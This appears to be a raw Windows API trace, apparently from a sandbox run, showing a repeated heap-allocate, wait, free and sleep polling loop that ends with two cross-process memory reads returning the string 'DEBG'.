	[0189.509] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.509] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.509] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.509] Sleep (dwMilliseconds=0xbb8) 
	[0189.525] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.525] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.525] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.525] Sleep (dwMilliseconds=0xbb8) 
	[0189.541] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.541] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.541] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.541] Sleep (dwMilliseconds=0xbb8) 
	[0189.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.556] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.557] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.557] Sleep (dwMilliseconds=0xbb8) 
	[0189.572] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.572] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.572] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.572] Sleep (dwMilliseconds=0xbb8) 
	[0189.588] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.588] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.588] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.588] Sleep (dwMilliseconds=0xbb8) 
	[0189.604] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.604] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.604] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.605] Sleep (dwMilliseconds=0xbb8) 
	[0189.619] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.619] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.619] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.619] Sleep (dwMilliseconds=0xbb8) 
	[0189.634] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.634] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.634] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.634] Sleep (dwMilliseconds=0xbb8) 
	[0189.650] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.650] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.650] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.650] Sleep (dwMilliseconds=0xbb8) 
	[0189.666] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.666] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.666] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.666] Sleep (dwMilliseconds=0xbb8) 
	[0189.681] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.681] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.681] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.681] Sleep (dwMilliseconds=0xbb8) 
	[0189.708] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.709] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.709] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.709] Sleep (dwMilliseconds=0xbb8) 
	[0189.712] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.712] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.712] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.712] Sleep (dwMilliseconds=0xbb8) 
	[0189.730] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.730] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.730] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.730] Sleep (dwMilliseconds=0xbb8) 
	[0189.744] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.744] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.744] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.744] Sleep (dwMilliseconds=0xbb8) 
	[0189.761] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.761] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.761] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.761] Sleep (dwMilliseconds=0xbb8) 
	[0189.775] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.775] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.775] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.775] Sleep (dwMilliseconds=0xbb8) 
	[0189.791] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.791] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.791] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.791] Sleep (dwMilliseconds=0xbb8) 
	[0189.806] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.806] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.807] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.807] Sleep (dwMilliseconds=0xbb8) 
	[0189.822] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.822] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.822] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.822] Sleep (dwMilliseconds=0xbb8) 
	[0189.839] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.839] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.839] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.840] Sleep (dwMilliseconds=0xbb8) 
	[0189.853] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.854] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.854] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.854] Sleep (dwMilliseconds=0xbb8) 
	[0189.869] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.869] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.869] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.869] Sleep (dwMilliseconds=0xbb8) 
	[0189.886] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.886] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.886] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.886] Sleep (dwMilliseconds=0xbb8) 
	[0189.901] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.901] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.901] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.901] Sleep (dwMilliseconds=0xbb8) 
	[0189.916] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.916] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.916] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.916] Sleep (dwMilliseconds=0xbb8) 
	[0189.947] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.947] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.947] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.947] Sleep (dwMilliseconds=0xbb8) 
	[0189.962] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.962] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.962] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.962] Sleep (dwMilliseconds=0xbb8) 
	[0189.978] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.978] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.978] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.978] Sleep (dwMilliseconds=0xbb8) 
	[0189.993] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.993] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.993] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.994] Sleep (dwMilliseconds=0xbb8) 
	[0190.009] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.009] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.009] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.009] Sleep (dwMilliseconds=0xbb8) 
	[0190.026] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.026] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.026] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.026] Sleep (dwMilliseconds=0xbb8) 
	[0190.040] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.040] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.040] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.041] Sleep (dwMilliseconds=0xbb8) 
	[0190.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.056] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.056] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.056] Sleep (dwMilliseconds=0xbb8) 
	[0190.072] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.072] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.072] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.072] Sleep (dwMilliseconds=0xbb8) 
	[0190.089] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.089] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.089] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.089] Sleep (dwMilliseconds=0xbb8) 
	[0190.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.104] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.104] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.104] Sleep (dwMilliseconds=0xbb8) 
	[0190.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.118] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.118] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.118] Sleep (dwMilliseconds=0xbb8) 
	[0190.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.134] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.135] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.135] Sleep (dwMilliseconds=0xbb8) 
	[0190.150] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.150] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.150] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.150] Sleep (dwMilliseconds=0xbb8) 
	[0190.165] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.165] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.165] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.166] Sleep (dwMilliseconds=0xbb8) 
	[0190.181] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.181] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.181] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.181] Sleep (dwMilliseconds=0xbb8) 
	[0190.197] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.197] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.197] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.197] Sleep (dwMilliseconds=0xbb8) 
	[0190.215] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.215] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.215] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.216] Sleep (dwMilliseconds=0xbb8) 
	[0190.228] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.228] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.228] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.228] Sleep (dwMilliseconds=0xbb8) 
	[0190.243] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.243] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.243] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.243] Sleep (dwMilliseconds=0xbb8) 
	[0190.282] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.282] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.282] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.282] Sleep (dwMilliseconds=0xbb8) 
	[0190.290] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.290] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.290] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.290] Sleep (dwMilliseconds=0xbb8) 
	[0190.305] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.305] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.305] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.305] Sleep (dwMilliseconds=0xbb8) 
	[0190.321] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.321] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.321] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.321] Sleep (dwMilliseconds=0xbb8) 
	[0190.337] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.337] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.337] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.337] Sleep (dwMilliseconds=0xbb8) 
	[0190.352] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.352] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.352] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.352] Sleep (dwMilliseconds=0xbb8) 
	[0190.368] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.368] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.368] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.368] Sleep (dwMilliseconds=0xbb8) 
	[0190.392] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.392] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.392] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.392] Sleep (dwMilliseconds=0xbb8) 
	[0190.399] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.399] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.399] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.399] Sleep (dwMilliseconds=0xbb8) 
	[0190.414] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.414] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.414] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.414] Sleep (dwMilliseconds=0xbb8) 
	[0190.430] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.430] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.430] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.430] Sleep (dwMilliseconds=0xbb8) 
	[0190.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.445] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.445] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.445] Sleep (dwMilliseconds=0xbb8) 
	[0190.461] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.461] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.461] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.461] Sleep (dwMilliseconds=0xbb8) 
	[0190.476] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.477] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.477] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.477] Sleep (dwMilliseconds=0xbb8) 
	[0190.493] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.493] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.493] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.493] Sleep (dwMilliseconds=0xbb8) 
	[0190.508] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.508] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.508] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.508] Sleep (dwMilliseconds=0xbb8) 
	[0190.524] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.524] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.524] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.524] Sleep (dwMilliseconds=0xbb8) 
	[0190.539] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.539] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.539] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.539] Sleep (dwMilliseconds=0xbb8) 
	[0190.555] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.555] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.555] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.555] Sleep (dwMilliseconds=0xbb8) 
	[0190.571] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.571] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.572] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.572] Sleep (dwMilliseconds=0xbb8) 
	[0190.586] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.586] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.586] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.586] Sleep (dwMilliseconds=0xbb8) 
	[0190.602] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.602] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.602] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.602] Sleep (dwMilliseconds=0xbb8) 
	[0190.617] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.617] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.617] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.617] Sleep (dwMilliseconds=0xbb8) 
	[0190.633] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.633] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.633] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.633] Sleep (dwMilliseconds=0xbb8) 
	[0190.649] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0190.650] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0190.650] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0190.650] Sleep (dwMilliseconds=0xbb8) 
	[0191.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264158
	[0191.147] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0191.147] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x264158) returned 1
	[0191.147] Sleep (dwMilliseconds=0xbb8) 
	[0191.273] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2649f0
	[0191.273] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0191.273] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2649f0) returned 1
	[0191.273] Sleep (dwMilliseconds=0xbb8) 
	[0191.335] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23005a0
	[0191.335] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0191.335] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23005a0) returned 1
	[0191.335] Sleep (dwMilliseconds=0xbb8) 
	[0191.382] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301220
	[0191.382] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0191.382] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2301220) returned 1
	[0191.382] Sleep (dwMilliseconds=0xbb8) 
	[0201.054] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0201.054] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x16ef7e6, lpBuffer=0x225390, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225390*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0201.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225390, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0201.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad1b0
	[0201.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225390, cbMultiByte=-1, lpWideCharStr=0x22ad1b0, cchWideChar=5 | out: lpWideCharStr="DEBG") returned 5
